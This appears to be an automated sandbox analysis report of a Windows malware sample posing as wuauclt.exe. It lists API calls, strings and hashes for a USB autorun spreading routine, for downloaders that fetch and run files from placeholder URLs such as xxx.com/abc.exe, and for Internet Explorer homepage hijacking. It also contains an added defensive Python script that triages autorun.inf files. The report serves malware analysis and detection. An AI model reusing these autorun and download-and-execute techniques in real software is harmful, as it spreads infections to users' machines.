                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406618
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction ID: d6a08cfd8c4e4eb5d113470b4235742803baeb825baf014acef4385ded9ab805
                                                                            • Opcode Fuzzy Hash: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction Fuzzy Hash: 31715370610108ABCB00FBA6C952A8E77B9AF84709F50853BB501B72D2CB7DAF11875D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040601B
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040607C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040609C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060C4
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060E7
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406105
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406123
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6), ref: 00406147
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406178
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 00406254
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406274
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction ID: 5df22afb16b272ec04df581e562d200e9037b34e0cc2cdfdfd0487ba17cb2571
                                                                            • Opcode Fuzzy Hash: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction Fuzzy Hash: C1711070A10508ABCB00FBA6C956A9F7779AF84709F50417BB501BB2D2CB7CAF05879D
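The two entries above (GetDriveTypeA, SetFileAttributesA with 0x06 and 0x80, DeleteFileA, GetModuleFileNameA, CopyFileA, and the strings [AutoRun], \autorun.inf, \sxs.exe, open=sxs.exe, shell\Auto\command=sxs.exe, shellexecute=sxs.exe) are the drive-infection routine behind the "Changes autostart functionality of drives" signature. The call order is consistent with clearing attributes to FILE_ATTRIBUTE_NORMAL (0x80) before DeleteFileA, which fails on read-only files, copying the running image next to a fresh autorun.inf, and then marking both FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM (0x06). What a responder wants from this is a way to triage an autorun.inf found on a drive root. The following is an added example written for this edit, not code from the report or from the sample: the autorun.inf body is constructed from the directives listed above (the file the sample actually writes was not captured here), and the extension list, function names and scan helper are the editor's choices; the attribute constants are the documented WinBase values.

```python
from __future__ import annotations

import re
from pathlib import Path

# Constructed sample (assumption): an autorun.inf body assembled from the directive
# strings the report lists for this routine.
SAMPLE_AUTORUN_INF = (
    "[AutoRun]\r\n"
    "open=sxs.exe\r\n"
    "shell\\Auto\\command=sxs.exe\r\n"
    "shellexecute=sxs.exe\r\n"
)

# Directives that make Explorer launch something: "open" and "shellexecute" fire on
# AutoRun/AutoPlay, "shell\<verb>\command" fires when that verb is picked from the
# drive's context menu. Keys are compared case-insensitively, as the INI reader does.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")

# Attribute values seen in the SetFileAttributesA calls above (documented WinBase values).
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04
FILE_ATTRIBUTE_NORMAL = 0x80


def parse_autorun_inf(text: str) -> dict[str, str]:
    """Return key=value pairs of the [autorun] section with lower-cased keys.
    Other sections, blank lines and ';' comments are skipped."""
    directives: dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            directives[key.strip().lower()] = value.strip()
    return directives


def launch_targets(directives: dict[str, str]) -> dict[str, str]:
    """Keep only the directives that cause code execution."""
    return {k: v for k, v in directives.items() if LAUNCH_KEY.match(k)}


def assess(text: str) -> list[str]:
    """Findings for one autorun.inf body: every launch directive whose program has an
    executable extension. A benign autorun.inf (icon=, label=) yields nothing."""
    findings: list[str] = []
    for key, target in launch_targets(parse_autorun_inf(text)).items():
        # First token is the program; a quoted path and any arguments are handled.
        program = target.split()[0].strip('"') if target else ""
        if program.lower().endswith(EXECUTABLE_EXT):
            findings.append(f"{key} launches {program}")
    return findings


def describe_attributes(flags: int) -> str:
    """Name the attribute bits, e.g. 0x06 -> 'HIDDEN|SYSTEM', 0x80 -> 'NORMAL'."""
    names = {FILE_ATTRIBUTE_HIDDEN: "HIDDEN", FILE_ATTRIBUTE_SYSTEM: "SYSTEM",
             FILE_ATTRIBUTE_NORMAL: "NORMAL"}
    return "|".join(n for bit, n in names.items() if flags & bit) or hex(flags)


def scan_drive_root(root: str) -> list[str]:
    """Triage <root>\\autorun.inf if present. Hidden+system attributes do not stop
    the read; only Explorer's default view hides such files."""
    inf = Path(root) / "autorun.inf"
    if not inf.is_file():
        return []
    return assess(inf.read_text(encoding="latin-1", errors="replace"))


if __name__ == "__main__":
    for finding in assess(SAMPLE_AUTORUN_INF):
        print(finding)
    print(describe_attributes(0x06), describe_attributes(0x80))
```

Run `scan_drive_root("E:\\")` against a mounted removable drive to apply the same check to a real file. Two caveats when reading the result: a drive that carries a launch directive pointing at an executable in its root is worth pulling, but the directive alone does not prove infection of the host it was plugged into, because Windows 7 and the KB971029 update restrict AutoRun to optical media, so the `open=`/`shellexecute=` lines do nothing on a patched machine; the `shell\Auto\command` verb, however, still runs if a user picks it from the context menu or double-clicks a drive whose default verb has been redirected.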

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile$CacheDownloadEntryFindSleepWindow
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w$t
                                                                            • API String ID: 2925464748-437854802
                                                                            • Opcode ID: 55d769b00b4cc51311f16a0815c2c7d4af7c3a2c72f53d4aaf0d0fdfd5a223a3
                                                                            • Instruction ID: fce2701fde403f0fd4f63779a484b59778674d3ae0df84e1f7a0fac326dad310
                                                                            • Opcode Fuzzy Hash: 55d769b00b4cc51311f16a0815c2c7d4af7c3a2c72f53d4aaf0d0fdfd5a223a3
                                                                            • Instruction Fuzzy Hash: F9811D70611205ABDB00FBA5D986A8E7BB9EF45708F10447BF540BB2E3CA78AD058B5D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405750
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000), ref: 0040575E
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004057E2
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057EC
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057FE
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405810
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405822
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405854
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$Download$ExecuteShell
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w
                                                                            • API String ID: 4037061717-2671944630
                                                                            • Opcode ID: bd639567ac3fd4388e3c6bd4f9e15b5f878b9b5c2a586539b18f924d682a37e1
                                                                            • Instruction ID: 785d72677e56ec84aa5b7725342f13d88417e98dc42c661718efd2ccd2bec02f
                                                                            • Opcode Fuzzy Hash: bd639567ac3fd4388e3c6bd4f9e15b5f878b9b5c2a586539b18f924d682a37e1
                                                                            • Instruction Fuzzy Hash: 1C61EE706111059BDB00FBA6D986E8E77B8EF45709F10447AF500BB2E3DA78ED048B9D

Control-flow Graph (graph image omitted)
APIs
• FindWindowA.USER32(bbyb,bbyb), ref: 00408C06
• FindWindowA.USER32(bbyb,bbyb), ref: 00408C1F
• PostMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C25
• FindWindowA.USER32(bbyb,bbyb), ref: 00408C3A
• SendMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C40
• SetFileAttributesA.KERNEL32(00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C68
• GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C94
• DeleteFileA.KERNEL32(00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408CC3
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00408CF5
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408D6D
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: File$FindWindow$Message$AttributesCopyDeleteDirectoryExecuteModuleNamePostSendShellWindows
• String ID: bbyb$open$wuauclt.exe
• API String ID: 2051752798-429206649
• Opcode ID: c8b33bf48d59ee998beae567223aa1bd64577581beb50e728ef37f833824f42e
• Instruction ID: e6955b423cf41d5715ab26280c9398332a00561a3d493f58480fbd492c7ff700
• Opcode Fuzzy Hash: c8b33bf48d59ee998beae567223aa1bd64577581beb50e728ef37f833824f42e
• Instruction Fuzzy Hash: 784130706502059BD740FBA6C943F8E7AB99F98709F10413BB640B75D2CE7CA900866D

Control-flow Graph (graph image omitted)
APIs
• DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
• Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
• DeleteUrlCacheEntry.WININET(00000000), ref: 00408380
• DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000), ref: 004083A3
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: Delete$File$CacheEntry$DirectoryDownloadSleepWindows
• String ID: HomePage$Software\Microsoft\Internet Explorer\Main$Software\Policies\Microsoft\Internet Explorer\Control Panel$Start Page$http://www.xxx.com/ie.txt$ies.dll$yes
• API String ID: 1217617683-1617324073
• Opcode ID: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
• Instruction ID: 23d5ada1644d4a4c0fdc49a889b3002e5e187da7be67f6644f1964e870e1d3b9
• Opcode Fuzzy Hash: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
• Instruction Fuzzy Hash: 9A413E702002099BD700FB65DA46A4E77B8AF84709F50847FB940BB6D3DB7CAE018A6D

Control-flow Graph (graph image omitted)
APIs
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405E02
• DeleteFileA.KERNEL32(00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000,?,00406707,00406725,?,00000000), ref: 00405E14
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405E39
• Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000), ref: 00405E47
• ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 00405EEE
• Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C), ref: 00405EF8
• DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405F0A
• DeleteUrlCacheEntry.WININET(00000000), ref: 00405F1C
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: Delete$File$CacheEntrySleep$DirectoryDownloadExecuteShellWindows
• String ID: A}vokwcq*`~f$`tn{5+r{p$kucm$lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p
• API String ID: 2803323816-32510556
• Opcode ID: d9c88504475ae06a2b29dbf263fa6e981639584f9090797de8e2b9f35afcf763
• Instruction ID: 62040580da8bc4b8ed49dd40f25ba5acd27351cacc19992f52bcfc8538425eb2
• Opcode Fuzzy Hash: d9c88504475ae06a2b29dbf263fa6e981639584f9090797de8e2b9f35afcf763
• Instruction Fuzzy Hash: 6241BC74711105ABD700FF6AD946A4E77B8EF85709F10407BB940BB2E3CA78AE018A6D
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 023118F7
• RegOpenKeyExA.KERNEL32(80000000,Applications\iexplore.exe\shell\open\command,00000000,00000001,?), ref: 02311911
• RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0231192B
• RegCloseKey.KERNEL32(?), ref: 02311985
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02311996
• ReadFile.KERNEL32(00000000,?,00000800,?,00000000), ref: 023119B6
• CloseHandle.KERNEL32(00000000), ref: 023119C0
Strings
• C:\Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 02311968
• Applications\iexplore.exe\shell\open\command, xrefs: 0231190B
Memory Dump Source
• Source File: 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: true
• Associated: 0000002A.00000003.2171747503.0000000002310000.00000004.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_3_2310000_wuauclt.jbxd
Similarity
• API ID: CloseFile$CreateDirectoryHandleOpenQueryReadValueWindows
• String ID: Applications\iexplore.exe\shell\open\command$C:\Program Files\Internet Explorer\IEXPLORE.EXE
• API String ID: 418526577-3772566379
• Opcode ID: 282a74c037d5d51c532906bfb234d1f3ba97972be5e22b44c2930ed54938e901
• Instruction ID: 7b3771a9e41e720791278f0a49b4f8e1d4c5d844510b33ae445245ab7f572dc6
• Opcode Fuzzy Hash: 282a74c037d5d51c532906bfb234d1f3ba97972be5e22b44c2930ed54938e901
• Instruction Fuzzy Hash: 17318EB190025DBFEB158E54DC84AEE7BBCFB05794F1044A6F699E6144D7309E80CBA0

Control-flow Graph (graph image omitted)
APIs
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
• Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
• Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: FileSleep$CopyDirectoryDownloadExecuteShellWindows
• String ID: bbyb.exe$bbybs.exe$http://www.xxx.com/abc.exe$open
• API String ID: 1899506612-3830082169
• Opcode ID: f6eaab7f91693ff3efbc4c5876b9fa1064e68bbbba0d4e86af0a7e17e86c47a2
• Instruction ID: bc9fdd56434a3f6b10c0c995d718bd545f813c534919513bdb7c3ec1913c9215
• Opcode Fuzzy Hash: f6eaab7f91693ff3efbc4c5876b9fa1064e68bbbba0d4e86af0a7e17e86c47a2
• Instruction Fuzzy Hash: A231F170A442096BD700FBA5D942BAE7BBDEF44709F50407BB500B76D2DB78BE00866E

Control-flow Graph (graph image omitted; legend: Executed / Not Executed). Basic blocks 408a20-408b12: 408a20-408a82 LoadIconA LoadCursorA RegisterClassA; 408a88-408aba call 404414; 408abc-408add SetTimer; 408aeb-408af9 GetMessageA; 408adf-408ae6 TranslateMessage DispatchMessageA; 408afb-408b0b KillTimer; 408b10-408b12.
APIs
• LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
• LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
• RegisterClassA.USER32(0042AE18), ref: 00408A7A
  • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
• SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
• TranslateMessage.USER32(0042AE44), ref: 00408AE0
• DispatchMessageA.USER32(0042AE44), ref: 00408AE6
• GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
• KillTimer.USER32(00000000,00007F51,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
Memory Dump Source
• Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
• Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
Similarity
• API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
• String ID: bbyb
• API String ID: 638683977-2792963345
• Opcode ID: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
• Instruction ID: 3bba51ca83177c78f7b5e7647297d040befd782e8eab32064d4fce7d17e62b12
• Opcode Fuzzy Hash: 533d18086f9685caa9f334b0e65846936dc3ea56f5248619355b98ba92471b9b
• Instruction Fuzzy Hash: 82213EB0780701AFD720EF659D42F1736E8AB44704F10593EBA45FB6D2DBB8A8118B5C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
